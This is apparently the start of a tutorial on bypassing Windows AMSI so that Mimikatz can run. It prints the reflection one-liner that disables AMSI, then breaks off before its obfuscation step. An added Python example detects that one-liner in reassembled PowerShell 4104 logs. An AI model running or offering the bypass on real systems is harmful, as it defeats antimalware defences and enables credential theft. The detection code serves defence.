AMSI Bypass
What is AMSI? The Antimalware Scan Interface (AMSI) probably makes your work harder by introducing an additional security layer that scans scripts for malware signatures. For example, if we just wanted to run Mimikatz, we'd get an annoying message like this:
The magic one-liner that originally worked looks like this:

    [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

but if you paste it into PowerShell, it will get flagged by AMSI before execution:
So let's come up with a simple AMSI bypass by obfuscating the one-liner. First, let's do this:
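On the detection side, and as an added example that is not part of the original page: with PowerShell script block logging enabled, the one-liner above is recorded in Event ID 4104, and a long script block is split across several events. The sketch below assumes the events have already been exported as dictionaries using the 4104 field names; the sample records are constructed. It reassembles the fragments before matching the two identifiers from the one-liner, because an identifier can straddle a fragment boundary.

```python
from collections import defaultdict

# Identifiers taken from the one-liner on this page, lower-cased for matching.
INDICATORS = ("system.management.automation.amsiutils", "amsiinitfailed")

# Constructed sample records (not real logs), shaped like the EventData of
# Event ID 4104: ScriptBlockId, MessageNumber, MessageTotal, ScriptBlockText.
SAMPLE_EVENTS = [
    {"ScriptBlockId": "aaaa-1111", "MessageNumber": 2, "MessageTotal": 2,
     "ScriptBlockText": "InitFailed','NonPublic,Static').SetValue($null,$true)"},
    {"ScriptBlockId": "bbbb-2222", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "Get-ChildItem C:\\Temp | Sort-Object Length"},
    {"ScriptBlockId": "aaaa-1111", "MessageNumber": 1, "MessageTotal": 2,
     "ScriptBlockText": "[Ref].Assembly.GetType('System.Management.Automation."
                        "AmsiUtils').GetField('amsi"},
    {"ScriptBlockId": "cccc-3333", "MessageNumber": 1, "MessageTotal": 2,
     "ScriptBlockText": "Write-Host 'first half of a longer script'"},
]


def reassemble(events):
    """Join fragments per ScriptBlockId in MessageNumber order.

    Returns {ScriptBlockId: (text, complete)}; complete is False when
    fewer fragments were seen than MessageTotal announces.
    """
    parts = defaultdict(dict)
    totals = {}
    for ev in events:
        sid = ev["ScriptBlockId"]
        parts[sid][ev["MessageNumber"]] = ev["ScriptBlockText"]
        totals[sid] = ev["MessageTotal"]
    return {sid: ("".join(frags[n] for n in sorted(frags)),
                  len(frags) == totals[sid])
            for sid, frags in parts.items()}


def scan(events):
    """Return one finding per reassembled script block that matches an indicator."""
    findings = []
    for sid, (text, complete) in sorted(reassemble(events).items()):
        hits = [i for i in INDICATORS if i in text.lower()]
        if hits:
            findings.append({"ScriptBlockId": sid, "indicators": hits,
                             "complete": complete})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Plain string matching like this only covers the literal identifiers, so treat a hit as a high-confidence alert and the absence of one as no evidence either way.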